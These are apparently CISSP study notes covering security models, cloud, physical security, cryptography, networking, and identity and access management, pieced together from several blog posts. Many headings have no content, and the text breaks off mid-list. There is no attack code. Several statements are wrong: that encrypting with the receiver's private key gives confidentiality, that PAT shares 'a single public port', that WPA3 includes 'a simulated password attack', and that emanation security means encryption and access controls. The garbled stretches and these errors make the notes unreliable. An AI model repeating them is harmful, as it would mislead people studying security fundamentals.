Assume your current balance is ₹1000, and you add ₹200 from app A, and ₹500
from app B

The following race condition occurs:

1. App A reads the current balance, which is ₹1000


2. App A adds ₹200 to ₹1000 and gets ₹1200 as the final balance
3. Meanwhile, app B fetches the current balance, which is still ₹1000, as
app A has not executed step 3
4. App B adds ₹500 to ₹1000 and gets ₹1500 as the final balance
5. App B updates the account balance to ₹1500
6. App A updates the account balance to ₹1200

Thus the final balance is ₹1200 instead of ₹1700


The above 3 steps in the app’s flow belong to its critical section, as the flow allows
multiple threads to access the same resource. In the above case, the bank balance
variable is a shared resource

This is an example of a read-write-modify race condition.

 Race conditions can leave the system vulnerable to security


attacks where attackers can tamper with the shared data
 Race conditions can be avoided by proper synchronization
between threads. In Java usage of synchronized and volatile
keywords helps us achieve the same

COVERT CHANNEL (CLOSED)


Communication mechanism hidden from access control and standard monitoring
system of an Information system.

A covert channel uses programs or communications paths in ways that were not
intended. Trojans can use covert channels to communicate

A covert channel is a secret or hidden communication channel used to transmit


information without being detected by an unauthorized party

Covert impacts
1. Confidentiality
2. Integrity

Race condition is Covert Timing

2 Types of Covert Channel

1. Storage channels — Communicate by modifying a “storage location”,


such as a hard drive.
2. Timing channels — Perform operations that affect the “real response
time observed” by the receiver.

Only way to mitigate is Secure Design of Information system

OVERT CHANNEL (OPEN)


An overt channel is a communications path that is not hidden.

An overt channel is the normal and legitimate way that programs communicate
within a computer system or network.

An overt channel, is a public or open communication channel that is easily


accessible and visible to all parties
EMANATION SECURITY (ES)
Preventing unauthorized intercept of EMI or RF signals from the devices.

Emanation security refers to the practice of protecting sensitive information or


assets from unauthorized access or disclosure through various means, such as
encryption, access controls, and physical security measures. It is an important
aspect of data security and privacy, as it helps to prevent sensitive information
from falling into the wrong hands.

Example 1 : In older TV when we keep phone near to it it had noise issue or


screen flickers.

Example 2 : Phone jammers in Military area. (To avoid frequency interception)

TEMPEST (It is a Standard) is used to protect against ES

TEMPEST Countermeasures include

1. Faraday Cage (Metal mesh to limit frequency)


2. White Noise (Fake signal)
3. Control Zones ( Combination of Faraday cage, White noise)

Any question on Side Channel Attack = Emanation Attack

SECURITY MODELS
It defines rules of behavior for an Information System to enforce policies related
to system but typically involving Confidentiality or Integrity policies of the system.

Security Model = Set of rules how SUBJECT talks to OBJECT


A) BELL — LAPADULA (CONFIDENTIALITY) MODEL

(1st model in DoD and specifically for CONFIDENTIALITY)

Rules

1. No Read Up (Simple Property)


2. No Write Down (Star Property)
3. Strong Star property rule ( Read Write at own level)
Example: To avoid accidently copying of sensitive data to be
accessible to lower subject
B) BIBA (INTEGRITY ) MODEL

Focuses on Integrity

Rules

1. No Read Down (Simple Integrity Property)


2. No Write Up (Star Integrity Property)
3. Lower level process cannot request Higher access
Example: Sr Management should not refer low subject.

Do not trust Data analysis based on Google rather trust higher subject based on
valid data source.
C) CLARK WILSON INTEGRITY MODEL (Rule Based)

1. 1st Commercial Model


2. Separation of Duties (Split into 2–3 person)
3. Ensures consistency data.
4. Prevents data modification by unauthorized party.
5. Prevents unnecessary data modification by authorized parties without
consent of all people.

Quick Point — Remember Clark as Bank Clerk, 2 people doing


job SoD . This is extended version of BIBA using 2-3 people

D) BREWER NASH MODEL — CHINESE WALL (Role Based)

SDLC Security Mode

1. One process separated from different process.


2. Designed to prevent conflict of interest.
3. Should not access confidential information of a client organization and
one or more of its competitor.

TRUST AND INSURANCE


A Trusted System is one in which all protection mechanism work together to
process sensitive data for many types of users while maintaining a stable and
securing computing environment.

Assurance is simply defined as the degree of confidence in satisfaction of


security needs. It should be continuously maintained, updated and reverified.

CERTIFICATION AND ACCREDIATION


Certification — Technical evaluation / validation to validate the product

Accreditation — Management formal acceptance to onboard the product

ACCREDATION BODY

1. TCSEC (Orange Book) — Trusted Computer System Evaluation


Criteria (Limited to DoD)

~ Confidentiality validation only (No Availability and Integrity)


~ Primary intended to help the DoD find products that met those basic
standards
~ Superseded by CC

2. CC — Common Criteria (ISO/IEC 15408)

~ 1st Truely International Product Evaluation Criteria


~ CC Introduced Protection Profiles (PP)
Protection Profile (PP) — Baseline

Target of Evaluation (TOE) — Proposed to Test

Target Security (ST) — Document explaining Security features

STANDARD EAL PACKAGES LEVEL (EAL = EVALUATION


ASSURANCE LEVEL)
Remember above using below — Check for 1st word

For Sure My Mother So Sweet Forever

Example — Mother corresponds to Methodically developed, tested and


proofed

CLOUD COMPUTING
Cloud = Remote Network

Computing = CPU, RAM, Storage, App ie All Infrastructure


Data Security and Compliance — — —> Customer Responsibility

Physical Security — — — — — — — — —> Cloud Provider


Responsibility

5 ESSENTIAL CHARACTERISTIC OF CLOUD


COMPUTING

1. OnDemand self service (Provision as and when required, No delay)


2. Broad Network Access (E.g. Go To Meeting, Join from anywhere)
3. Resource Pooling (Shared by Multi Customer)
4. Rapid Elasticity ( Scale Up and Scale Down)
5. Measure Service (How much utilization e.g Billing)
A) IAAS (INFRASTRUCTURE AS A SERVICE)
1) Customer can install OS of its choice
2) Customer can install Application of its choice
3) Customer can provision resources (Storage, N/W, S/W, App)

2) Total control on App, Middleware and Guest OS


3) No control on underlying Cloud hardware

High Operational Cost

B) PAAS (PLATFORM AS A SERVICE)


1) Customer deploy own application
2) Customer no control on underlying cloud architecture
3) Customer has control on application deployed

Development companies use PAAS to develop application

C) SAAS (SOFTWARE AS A SERVICE)


1) Customer do not manage Cloud Infrastructure
2) User provide application running in cloud

Low Operational Cost


B) FAAS (FUNCTION AS A SERVICE)
FaaS is a cloud computing model that allows developers to execute individual functions or pieces of code in a
serverless environment.
Serverless Computing: FaaS eliminates the need for developers to manage server infrastructure. It
abstracts away the server-level details, such as provisioning, scaling, and maintenance, allowing developers to
focus solely on writing and deploying code.

Event-Driven: FaaS is event-driven, meaning functions are triggered by specific events or requests.
These events can include HTTP requests, database changes, file uploads, or custom events, allowing for a highly
responsive and scalable system.

Pay-as-You-Go Pricing: With FaaS, you only pay for the actual compute resources used during the
execution of functions. There are no upfront costs or idle resources, making it cost-efficient and scalable for a
wide range of applications.

Rapid Scaling: FaaS platforms automatically scale functions in response to increased workloads. This
elasticity ensures that your application can handle varying levels of traffic without manual intervention,
improving reliability and performance.

Microservices and Decoupling: FaaS is well-suited for building microservices-based


applications, as it encourages the decomposition of complex applications into smaller, single-purpose functions.
This decoupling simplifies development, testing, and maintenance while promoting modular and reusable code.

CLOUD DEPLOYMENT MODELS


A) PRIVATE CLOUD (More Control, High Cost)

1)For only one company


2) May be managed by company or 3rd party
B) PUBLIC CLOUD (Less Control, Less Cost)

1)Generic public
2) Available to large industry
3) Example: AWS EC2 is an example

C) COMMUNITY CLOUD (Shared Cost)

1)Shared by multiple companies


2) May be OnPrem or Off Prem
3) May be managed by company or 3rd party
4) Many companies come together and share Infrastructure
5) Example: Adani group of companies sharing Cloud Infrastructure
D) HYBRID CLOUD

1)Mix of Private, Public and Community


2) Used during peak period for extra compute for specific period
3) Example: BCP/DR (Main on Private and DR on Public ie AWS/Azure)
SUMMARY
C ASB (CLOUD ACCESS SECURITY BROKER)

Interface to monitor cloud security


1)Helps organization extend OnPrem controls to Cloud provider
2) Discovers unauthorized attempt to access private data
3) Offers single platform for extending or enhancing your security posture
4) Provides visibility what is happening in cloud
5) Example: MS Defender, Qualys Guard

PHYSICAL SECURITY / FACILITY DESIGN

Security Survey

To identify gaps
2) What we have and what we need

Physical Security is a combination of “PEOPLE, PROCESS,


PROCEDURE and TECHNOLOCY”

~ Identify Risk
~ Acceptable Risk Level
~ Baseline Performance
~ Implement Countermeasure
CPTED (CRIME PREVENTION THROUGH ENVIRONMENT DESIGN)

Proper design of Physical environment can reduce CRIME

Example 1: Family Man example where Manoj Bajpai slaps his Boss in closed
cabin, hence sometime cabins can become a Threat.

Example 2: Person can see through glass from inside (Boss) but reverse is not
possible, its rather a mirror from outside.

INTERNAL SECURITY CONTROLS

1. Control of Human Safety — Visible and Audible alarms, fire suppressions


2. Control of Manage Access — Door locker, MFA
3. Internal Monitoring — CCTV, RF monitoring
PERIMETER SECURITY CONTROLS
PHYSICAL PROTECTION

1. Turnstile — — -> Single person, Moving door (Metro Train station


access)
2. Mantrap —→Single person, one person at a time (Datacenter in
Europe)
3. Tailgating — -> No Consent (Gets access secretly from behind with
someone who generally is in phone and not aware)
4. Piggybacking — → Consent (Someone asks for access)

UTILITIES

POWER :

1. Redundant power inputs from utilities


2. Redundant power delivery (Different provider)
3. Backup generators
4. Battery backup
5. Dual power Infra within DC
6. Backup source must be tested / exercised
7. Backup source must be seized appropriately and upgraded when load
increased.
FIRE SUPPRESSION:
FIRE STAGES

Best solution for fire is at stage 2 and use of Ionization Detectors

WATER BASED FIRE SUPPRESSION


GAS SYSTEMS (Operate to STARVE the fire for Oxygen)
1. AERO K : Safest for Human
2. FM-200

HALON is very dangerous

DATACENTER TYPES (TIER = LEVEL OF


REDUCNDANCY)

Uptime Institute Data Center Design — Standard

IDC(International Datacenter Authority) — OPEN

As per NFPA (National Fire Protection Authority) recommends


IT facility should withstand exposure to fire until 60 Minutes
In Datacenter we need POSITIVE PRESSURIZATION

HVAC (HEAT VENTILATION AIR CONDITIONING)

1. Cooling should be designed


2. Adequate cooling and airflow
3. Airflow should be filtered for contaminates
4. Less humidity to avoid Corrosion
5. Types of Cooling

Latent Cooling — Remove Moisture

Sensible Cooling — Remove Heat


Temp : 60 –70 deg Fahrenheit i.e. 15 to 23 deg Centigrade and
Humidity: 50%

Power Spike — — — → Temp period of HV (High Voltage)

Power Surge — — — -> Loooooooong period of HV

Power Fault — — —>Temp LOSS of power

Power Blackout — → Complete LOSS of power

Power Brownout — -> Long period of LV (Low Voltage)

Power Dip / Sag — — -> Temp period of LV

— — — — END OF PHYSICAL SECURITY — — — — —

EMBEDDED SYSTEM

1. IoT (Internet over Things)


2. ICS ( Industrial Control Systems) Example SCADA, PLC and DCS

Protocol used : Modbus and DNP3

A) ICS ( Industrial Control Systems)

1. Dedicated computing platform


2. Limited Processing power
3. Limited functions
4. Specialized OS
5. Long service life in many application
6. Biggest concern = Availability
7. System/ Network should be separate from General office networks
B) IoT (Internet over Things)
MOBILE SYSTEMS MITIGATION

Concern = Data Security

1. Encryption ( Most effective solution)


2. Bluetooth capability lockdown
3. Prevent Jailbreak or Rooting
4. Remote policies should be pushed
5. Implement device lockdown
6. Endpoint security should extend to mobile end points
7. Use MDM (Mobile Device Mgmt.) / MFA (Multi Factor Authorization)

HOST Protection Software's

1. Antivirus
2. Host based IPS / IDS
3. Host Firewall
4. File Integrity Monitoring
5. Config and Policy monitor

CRYPTOGRAPHY
ENCODE — Replace the character A — → 8 & B — — → 9

Encryption — Convert to Binary 00001

Crypto has 2 part 1) Algorithm (Logic) and 2) Key (Factor)

Example:

1)Algorithm = Functionality of Lock


2) Key = Its mechanism

CRYPTOGRAPHIC GOALS

1)Confidentiality
2) Integrity
3) Authenticity
4) Non Repudiation

Cryptography originally used for SECRECY but now used for

1)Unauthorized disclose
2) Detect Tampering
3) Prevent Repudiation

A) SYMMETRIC CRYPTOGRAPHY (CONFIDENTIALITY)


B) ASYMMETRIC CRYPTOGRAPHY

NEVER USE FOR BULK ENCRYPTION


ONLY USE FOR KEY ENCRYPTION
C) HYBRID CRYTOPGRAPHY (ONLY CONFIDENTIALITY IS
ACHIEVED HERE)

DIGITAL SIGNATURE
S/MIME Process (Secure/Multipurpose internet Mail Extensions)
Strength of Encryption Key

1)Algorithm
2) Secrecy of Key
3) Length of Key

CRYPTOGRAPHY: Science of Hiding

CRYPTOANALYSIS: Science of studying and breaking secrecy

CRYPTOSYSTEM: Mechanism that carries out cryptography

WORK FACTOR: Amount of time and resource to break Cryptosystem

ALGORITHM: Procedure to encrypt Plain text into Cipher text

KEY: Used in conjunction with algorithm to encrypt/decrypt

KEYSPACE: Range of key values to be used in Algorithm

EXAM Qts:

1)What's is Vernam Cipher


2) Which cryptography impossible to crack
3) Use if sensitive data

Answer is OTP

INITIALIZATION VECTOR (IV)

It randomize values to avoid same value for everyone


Example: Home WIFI has separate values for every member
connecting with same password

DATA ENCRYPTION STANDARD (DES)


AES ( ADVANCED ENCRYPTION STANDARD)
ASYMMETRIC ALGORITHM
1)RSA
2) DH
3) ELGAMAL
4) ECC (Elliptic Curve Cryptography)

The aboveillustration highlights how asymmetric cryptography works

Different Security Goals

1. Authenticity (Open Message Format) — Encrypt with SENDERS


Private Key (NO CONFIDENTIALITY)
2. Confidentiality (Secure Message Format)- Encrypt with RECEIVERS
Private Key (CONFIDENTIALITY)
3. Authentication and Confidentiality (Secure and Sign Format) —
Secure and Sign

A) RSA (Rivest Shamir Adleman) — (Based on Factorization)

The RSA algorithm is an asymmetric cryptography algorithm; this means that it


uses a public key and a private key (i.e two different, mathematically linked keys).
As their names suggest, a public key is shared publicly, while a private key is
secret and must not be shared with anyone.
B) ECC (Elliptic-curve cryptography) — (Based on Discrete Algorithm)

ECC is another type of asymmetric mathematics that is used for cryptography.


Unlike RSA, which uses an easily understood mathematical operation — factoring
a product of two large primes — ECC uses more difficult mathematical concepts
based on elliptic curves over a finite field. The ECC cryptography is considered
a natural modern successor of the RSA cryptosystem, because ECC
uses smaller keys and signatures than RSA for the same level of security and
provides very fast key generation, fast key agreement and fast signatures.
C) DH (Diffie Hellmann) — (Based on Discrete Algorithm)

Based on public key cryptography, the D-H algorithm is a method for securely
exchanging a shared key between two parties over an untrusted network. It is an
asymmetric cipher used by several protocols including SSL, SSH, and IPsec.
D) EL GAMAL — (Based on Discrete Algorithm)

El Gamal algorithm is used in encryption and decryption, which is mainly


considered for its capability to make the key predictions extremely tough. The
asymmetric algorithm uses the mechanism of private and the public key, making
the key predictions even tougher
E) MAC (Message Auth Code)

A Message Authentication Code (MAC) is a cryptographic technique that verifies


the integrity and authenticity of a message. It involves a secret key to generate a
fixed-size code (tag) from the message. Recipients can use the same key to
recompute the tag and compare it to the received one, ensuring data integrity and
origin authenticity.
F) QC (Quantum Cryptography)

Quantum cryptography is a secure communication method that uses the


principles of quantum mechanics. It leverages quantum properties like
superposition and entanglement to create unbreakable encryption keys. Any
attempt to intercept the quantum-entangled keys would alter their state, alerting
users to potential eavesdropping, ensuring highly secure data transmission.
KEY MANAGEMENT PRACTICES

Key management is a crucial practice in cryptography and security. It involves


generating, storing, distributing, and safeguarding cryptographic keys used for
encryption, decryption, and authentication. Key management practices include:

1. Key Generation: Creating strong, random keys.


2. Key Storage: Safely storing keys to prevent unauthorized access.
3. Key Distribution: Securely sharing keys among authorized parties.
4. Key Rotation: Periodically changing keys to limit exposure.
5. Key Revocation: Deactivating compromised or unused keys.
6. Key Backup: Storing copies of keys for recovery.
7. Access Control: Restricting key access to authorized users.
8. Audit and Monitoring: Regularly reviewing key usage and changes.
9. Cryptographic Algorithms: Selecting strong encryption methods.
10. Hardware Security Modules (HSMs): Using specialized devices for key
protection.

Effective key management ensures data confidentiality and integrity in secure


communication and storage systems.
SUMMARY
PKI (PUBLIC KEY INFRASTRUCTURE)
Public Key Infrastructure (PKI) is a framework of hardware, software,
policies, and standards used to manage digital keys and certificates, facilitating
secure communication and authentication in a networked environment. Here’s an
overview of PKI:

1. Digital Certificates: PKI relies on digital certificates, which bind a


user’s or entity’s identity to their public key. Certificates are issued by
trusted entities called Certificate Authorities (CAs).
2. Certificate Authority (CA): CAs are responsible for verifying the
identity of certificate requesters and issuing digital certificates. Trusted
CAs are essential for a PKI’s security.
3. Public and Private Keys: PKI uses asymmetric encryption, where
each user/entity has a pair of public and private keys. The public key is
shared, while the private key is kept secret.
4. Key Pair Generation: Users generate their key pairs and obtain digital
certificates from CAs. The CA verifies the user’s identity before issuing a
certificate.
5. Certificate Revocation: CAs maintain Certificate Revocation Lists
(CRLs) to track and revoke compromised or no longer valid certificates.
6. Key Recovery: Some PKIs include mechanisms for key recovery in case
users lose their private keys.
7. Secure Communication: PKI is used to secure communication by
encrypting data with the recipient’s public key and decrypting it with
their private key.
8. Authentication: PKI enables strong authentication by verifying the
digital certificate of the communicating parties, ensuring their identities.
9. Digital Signatures: Digital signatures are used for data integrity and
authentication. A sender signs data with their private key, and the
recipient verifies it using the sender’s public key.
10. Secure Email, SSL/TLS, VPNs: PKI is widely used in secure email,
web browsing (SSL/TLS), and virtual private networks (VPNs).
CRYPTOGRAPHIC PROCESS
ATTACK ON CRYPTOSYSTEM
EXAM POINTS (IMPORTANT AND BRIEF)
CISSP: Domain 4 — Communications and
Network Security : Easy Notes to Pass CISSP
Certification in 2023–24
[Link]
829f44560a7b

DOMAIN OBJECTIVES
OSI AND TCP/IP
FIREWALL ARCHITECTURE
WIRELESS
BLUETOOTH
UNDERSTANDING OF PROTOCOLS
VPN TYPES
RADIUS AND TACACS
ATTACKS

OSI MODEL
Easy way to remember 7 layers using below sentence

All People Seems To Need Data Processing

OSI vs TCP/IP Layer


P HYSICAL LAYER
D ATA LINK LAYER
N ETWORK LAYER
T RANSPORT LAYER

S ESSION LAYER
P RESENTATION LAYER

A PPLICATION LAYER
NETWORK DEPLOYMENT AND PROTOCOLS

NETWORK ZONES

Trusted — Windows, Linux, Database Servers, SIEM

DMZ — Web Server, IPS/IDS, DNS, Email, VPN

Untrusted — Web Server, SIEM, IPS/IDS


FIREWALL ARCHITECTURE

D UAL HOMOED HOST (MULTIHOME)


S CREEN HOST
S CREENED SUBNET
CONVERGENCE AND IP CONVERGENCE

1. Converged IP network is s single platform on which interoperable device


can be run in innovative ways.
2. Excellent support for multimedia application converged implied that the
2 protocol became one.
3. Using common network protocol to convert unsupported protocols
FCoE (FIBRE CHANEL OVER ETHERNET
iCSi (INTERNET SCSI SMALL COMP SYSTEM INTERFACE)
MPLS (MULTIPROTOCOL LABEL SWITCHING)
VoIP (VOICE over IP)

WIFI (WIRELESS LAN)


WiFi operates on radio waves, typically using the 2.4 GHz and 5 GHz frequency
bands, to transmit data between devices and access points (routers). These radio
waves are modulated to carry digital information, allowing for the wireless
transfer of data packets.

One of the primary advantages of WiFi is its versatility and widespread use. It has
become an integral part of homes, businesses, public spaces, and even
transportation systems. WiFi enables seamless internet access, file sharing, and
communication across a multitude of devices, making it an essential technology in
our connected world.
WIRELESS SECURITY STANDARDS

WEP (WIRED EQUIVALENT PRIVACY)

WEP (Wired Equivalent Privacy) is the oldest and most common Wi-Fi security
protocol. It was the privacy component established in the IEEE 802.11, a set of
technical standards that aimed to provide a wireless local area network (WLAN)
with a comparable level of security to a wired local area network (LAN

▪ WEP Uses the Stream cipher RC4 for Confidentiality and CRC-32 Checksum for
Integrity.

▪ Key & IV Length is small hence vulnerable to Brute Forces attacks.

▪ Biggest concern: Privacy


WPA (WiFi Protected Access)

WPA (Wi-Fi Protected Access) is a security protocol used to secure Wi-Fi


networks. It protects against unauthorized access to your network by encrypting
data transmitted over the network.

No need to change hardware

WPA2 (Used in Enterprise)

WPA2 is a security protocol used for Wi-Fi networks. It provides encryption for
data transmitted over the network, protecting users from unauthorized access and
tampering. WPA2 is the most commonly used security protocol for Wi-Fi
networks and is considered to be highly secure when properly configured.
Required upgrade of Hardware

WPA3

WPA3 is the latest security standard for Wi-Fi networks, designed to provide
enhanced security and privacy for users. It replaces WPA2 and includes new
features such as a simulated password attack, faster handovers, and improved
security for Personal Area Networks (PAR). With WPA3, your Wi-Fi connection
will be more secure and protected against unauthorized access.
LiFi (LIGHT FIDILITY)

Li-Fi, short for “light fidelity,” is a wireless communication technology that uses
visible light from LED bulbs to transmit data. It is an alternative to traditional Wi-
Fi and has the potential to offer faster and more secure internet connectivity. Li-Fi
operates by modulating the intensity of light to carry binary data, allowing devices
equipped with Li-Fi receivers to connect to the internet. This technology is still in
the early stages of development and is being explored for various applications,
such as indoor positioning and high-speed internet in areas where Wi-Fi is
limited. However, it is important to note that Li-Fi requires a direct line of sight,
which may limit its usability in certain scenarios.

Ask a followup

ZIGBEE

Used for IOT

IEEE 802.15.4 standard


Zigbee is a wireless communication technology that is commonly used for low-
power, low-cost wireless sensor and control networks. It is designed for short-
range, low-data rate applications. Zigbee networks can be used in various
industries, including home automation, smart energy management, and industrial
control systems. Some popular Zigbee devices include smart light bulbs,
thermostats, and security sensors.

SECURING NETWORK COMPONENTS

FIREWALLS

1st Generation — — — -> Packet Filters

2nd Generation — — —> Proxies (Application level and Circuit Level Proxy)

3rd Generation — — — — — — — -> Stateful


1st GENERATION STATIC PACKET FILTERING (STATELESS)
2nd GENERATION FIREWALL
3rd GENERATION FIREWALL (STATEFUL)

4th GENERATION FIREWALL (NEXT GEN)

Works from layer 3 to Layer 7

NAC (NETWORK ACCESS CONTROL)


Network Access Control (NAC) refers to a security approach that enforces policies
to control access to network resources based on various factors such as user
identity, device security posture, and location.

NAC solutions help organizations ensure that only authorized users and devices
have access to their networks, protecting against unauthorized access, data
breaches, and other security risks.
NAC solutions typically involve a combination of hardware and software
components that work together to authenticate users and devices, enforce access
policies, and continuously monitor and manage network access.

Some popular NAC solutions include Cisco Identity Services Engine (ISE), Aruba
ClearPass, and Pulse Secure.

NAT (NETWORK ADDRESS TRANSLATION & PAT (PORT


ADDRESS TRANSLATION)
Both are network techniques used to manage IP addresses and ports. Both
techniques are commonly used in network settings to simplify address
configuration and improve security.
NAT allows multiple devices on a private network to share a single public IP
address, while

PAT allows multiple devices on a private network to share a single public port.

DESIGN AND ESTABLISH SECURE COMMUNICATION


CHANNEL
PROTOCOL — Sets of rule with which 2 device communicates
IPSEC
SSH (SECURE SHELL PROTOCOL)

1)Replacement of Telnet
2) Cryptographic network protocol
3) Prevents MITM attack (Man in Middle)
4) SSH2 provides more security against Eavesdropping, DNS&IP Spoofing and
MITM attack.
TLS vs SSL
AUTHENTICATION PROTOCOLS (PAP, CHAP, EAP)
EAP TYPES
DIAL-UP PROTOCOL (PPP and SLIP)
VPN (VIRTUAL PRIVATE NETWORK)
A VPN, or Virtual Private Network, is a technology that allows you to create a
secure and encrypted connection between your device and the internet. It creates
a private network within a public network, protecting your online activities and
data from prying eyes. With a VPN, you can browse the internet anonymously,
access geo-restricted content, and protect your sensitive information from hackers
and surveillance. VPNs are especially useful when using public Wi-Fi networks, as
they add an extra layer of security.

3 Types of VPN

1)Remote Access VPN, 2) Site to Site IPSEC VPN and 3) Extranet VPN
VPN MODES

VPN tunnel modes refer to the different methods used to encapsulate and
transport data securely over a virtual private network (VPN). The two commonly
used tunnel modes are transport mode and tunnel mode.

Transport mode is used when the VPN endpoints are directly connected to the
Internet or the public network. In this mode, only the data payload of the packet is
encrypted and encapsulated before being sent over the network. Transport mode
is typically used for point-to-point VPN connections.

Tunnel mode, on the other hand, is used when the VPN endpoints are not
directly connected to the Internet. In this mode, the entire IP packet, including
the original IP header, is encrypted and encapsulated within another IP packet.
Tunnel mode is commonly used in site-to-site VPN connections where multiple
devices need to communicate securely over the public network.

Both tunnel modes offer different levels of security


RADIUS (Remote Authentication Dial-In User Service)

Using the Remote Authentication Dial-In User Service (RADIUS) protocol for
network security and access control is referred to as “radius networking.” Network
devices can connect with a centralized authentication server to check user
credentials, grant access, and monitor accounting data using the widely used
RADIUS protocol. In settings like Wi-Fi networks, Virtual Private Networks
(VPNs), and Network Access Control (NAC) systems, it is frequently employed. By
offering centralized authentication and access control throughout their network
infrastructure, enterprises can increase security, streamline management, and
improve user experience by deploying RADIUS networking.
TATACS+ (Terminal Access Controller Access-Control System)

A network protocol called TACACS (Terminal Access Controller Access Control


System) is used in computer networks for centralized authentication,
authorization, and accounting (AAA) services. By limiting who can enter into
network devices and what they can do once logged in, it offers a mechanism to
govern and secure network access. TACACS allows for more flexibility and control
over network access by separating the roles of authentication, authorization, and
accounting. Organizations can increase network security and more efficiently
manage user access by deploying TACACS.
DIAMETER

A technology called DIAMETER networking is utilized for both IP address routing


and authentication. By giving devices a way to confirm the identities of other
devices on a network, it promotes secure communication. In telecommunications
and Internet of Things applications, DIAMETER networks are frequently
employed.
CDN (CONTENT DELIVERY NETWORK)

A content delivery network (CDN) is a group of dispersed servers that assists in


delivering web content to users according to their location. The way CDNs
function is by caching copies of web content in numerous data centers all over the
world. The CDN routes a user’s webpage request to the closest server, minimizing
latency and speeding up page load times. Popular websites and platforms
frequently employ CDNs in order to handle high traffic volumes, assure quick
content delivery, and enhance user experience.
SNMP (SIMPLE NETWORK MANAGEMENT PROTOCOL)

SNMP (Simple Network Management Protocol) is a widely used protocol for


network management, allowing administrators to monitor and configure network
devices, such as routers, switches, and servers. It uses a hierarchical management
structure, with a management station (management applications) communicating
with agents running on devices, providing management information and receiving
configuration data.
VLANS (VIRTUAL LOCAL AREA NETWORK)

VLANs, also known as Virtual Local Area Networks, are a way to logically divide a
physical network into smaller segments. This helps with network management,
security, and performance optimization. With VLANs, devices can be grouped
based on factors like department, location, or function, and can communicate
with each other as if they were connected to the same physical network. VLANs
can help reduce network congestion by segmenting traffic and improving overall
network performance.
SDN (SOFTWARE DEFINED NETWORK)

SDN stands for Software-Defined Networking. It is a network architecture that


separates the control plane from the data plane, allowing for more flexibility and
programmability in network administration. SDN enables network administrators
to define and enforce network policies through software, rather than through
manual configuration of network devices.
MICRO SEGMENTATION

PREVENT OR MITIGATE NETWORK ATTACK

1. Email Server
2. SPAM
3. Port-Scan
4. Tear Drop
5. Overlapping Fragment Attack
6. SMURF Attack
7. Fraggle Attack
8. DoS
9. SYN Flood
10. Spoofing
[Link] Attack
12. DNS Spoofing Atack
CISSP: Domain 5 — Identity and Access
Management : Easy Notes to Pass CISSP
Certification in 2023–24
[Link]
faeba1673a58

DOMAIN OBJECTIVES
CONTROL PHYSICAL AND LOGICAL ACCESS TO ASSETS
MANAGE IDENTIFICATION AND AUTHENTICATION OF PEOPLE, DEVICES
AND SERVICES
FEDERATED IDENTITY WITH 3RD PARTY SERVICES
IMPLEMENT AND MANAGE AUTHORIZATION MECHANISMS
MANAGE THE IDENTITY AND ACCESS PROVISIONING LIFECYCLE
IMPLEMENT AUTHENTICATION SYSTEMS

Control physical and logical access to assets


o Object: — A passive entity, such as a server, that houses information or
functionality.
o Subject: —Anyone who asks access to an object or the data contained in an
object, such as a user, program, or process.
o Access: — information passing from a subject to an object.
Access Control Systems

Systems, either physical or technological, that are intended to regulate who or


what has access to a network. The most basic illustration is a door that can be
locked, preventing individuals from entering from either side.
• By — Whom (Employees, Third Parties, Visitors, Anonymous)
What (Device, Named, Anonymous)
• To — Assets — Information, Systems, Equipment, and Infrastructure
There are two types of Access Control systems

Physical ( Physical lock)


▪ History of “whom” and “when”
▪ Time and Attendance

Technical/Logical
▪ Built into Operating System
▪ Part of logic of APP or DB
▪ Third Party
▪ Control communication

Administration Approach

1. Centralized
2. Decentralized
3. Hybrid

Centralized administration

1) By centralized administration, we mean that one component is in charge of


setting up access controls so that users can access data and carry out their
necessary tasks.

2) The key benefit of centralized administration is the ability to keep extremely


stringent control over information because very few people have the authority to
make changes. Simple to Control.

3) Uniform and consistent standards and procedures.


Decentralized administration (user decides)

1) In contrast to centralized administration, decentralized administration means


that the owners or authors of the files, whoever or wherever they may be, control
access to information.

2) Control is in the hands of those who are most responsible for the information,
most knowledgeable with it, and most equipped to determine who should be able
to do what in respect to it, which is a benefit of decentralized administration.

3) One drawback, however, is that the methods and standards for granting user
access and capabilities may not be uniform among creators/owners.

4) Another drawback is that it could be more challenging to create a system-wide


view of all user access to the system at any given time when requests are not
centrally processed.

Hybrid approach

1. A hybrid approach allows for both centralized and decentralized


management of certain types of information.

One usual approach is that the file creators/owners govern the types of
access or users’ capabilities for the files under their control, while central
administration is in charge of the broadest and most basic access.

Manage identification and authentication of people,


devices, and services
Identification, Authentication, and Authorization

Relationship between Identification, Authentication, and Authorization


• Identification provides uniqueness
• Authentication provides validity of the identity
• Authorization provides control over access levels

Identification
1) It is the first step in all access control and asserts a distinct identity for a person
or system.
2) It is impossible to decide how to implement the proper controls without
adequate identification.

Authentication
1) It is the process of confirming a user’s identity.
2) The user gives a set of personal information that only they have access to or
knowledge of.

Something you own along with something you know and are. Auditing
(Accountability) won’t be successful without authentication.

Authorization
1) The process of identifying the precise resources a user requires.
2) And figuring out what kind of access the user might have to those resources.
Identification Methods

▪ Identification / Access Badge


▪ User ID
▪ Mac address
▪ Account Number
▪ RFID / FASTag
▪ IP Address

SSO (SINGLE SIGN ON)

1)Single sign-on (SSO) enables users to log in only once and then be automatically
authenticated when accessing other resources.
2) A unified login experience.
3) A central database for user credentials (such as passwords and user IDs linked
to a number of applications).
4) Authenticates once
5) The SSO client mimics a user entering his or her own user ID and password.
6) Single Point of Failure is the Main Issue

Weakness of Centralized SSO Systems


1) A single password is used to safeguard all of a user’s credentials in centralized
SSO systems.
2) Many SSO systems maintain a single database that contains all user credentials
and authentication data.

KERBEROS PROTOCOL

▪ Uses Symmetric Encryption ( AES )


▪ The primary goal of Kerberos is to ensure private communications between
systems over a network.
▪ SSO authentication system that provides enhanced security features.

The Kerberos security system guards a network with three elements


• Authentication
• Authorization
• Auditing

Based on the interaction between three systems


• Requesting system
• Endpoint destination server
• Kerberos or Key Distribution Center ( KDC) who issues the ticket
Kerberos Authentication Process

Kerberos Tickets
▪To request and obtain service tickets, the User must first authenticate themselves
once using a conventional log-on process and be confirmed by message
encryption.
▪The user just obtains a TGT (Ticket Granting Ticket) after successfully
authenticating with the AS (Authenticate Server).
▪The TGT enables the user to ask the TGS (Ticket Granting Service) for a service
ticket, authenticate using encryption procedures, and create a ST (Service Ticket)
for the user to give to the target resource system.
▪The possession of ST denotes that the user has been verified and that access may
now be granted.
▪Ticket have lifeline
Limitations of Kerberos:
○ The security of the whole system depends on careful implementation.
○ KDC can be a target
○ KDC can be a single point of failure and should be supported by backup and
continuity plans
○ The length and lifetime of the keys is very important.

SESAME: (Alternative to Kerberos)

Supports both Symmetric and Asymmetric encryption

SINGLE / MULTIFACTOR AUTHENTICATION


• Something you know. e.g. Password or Pin
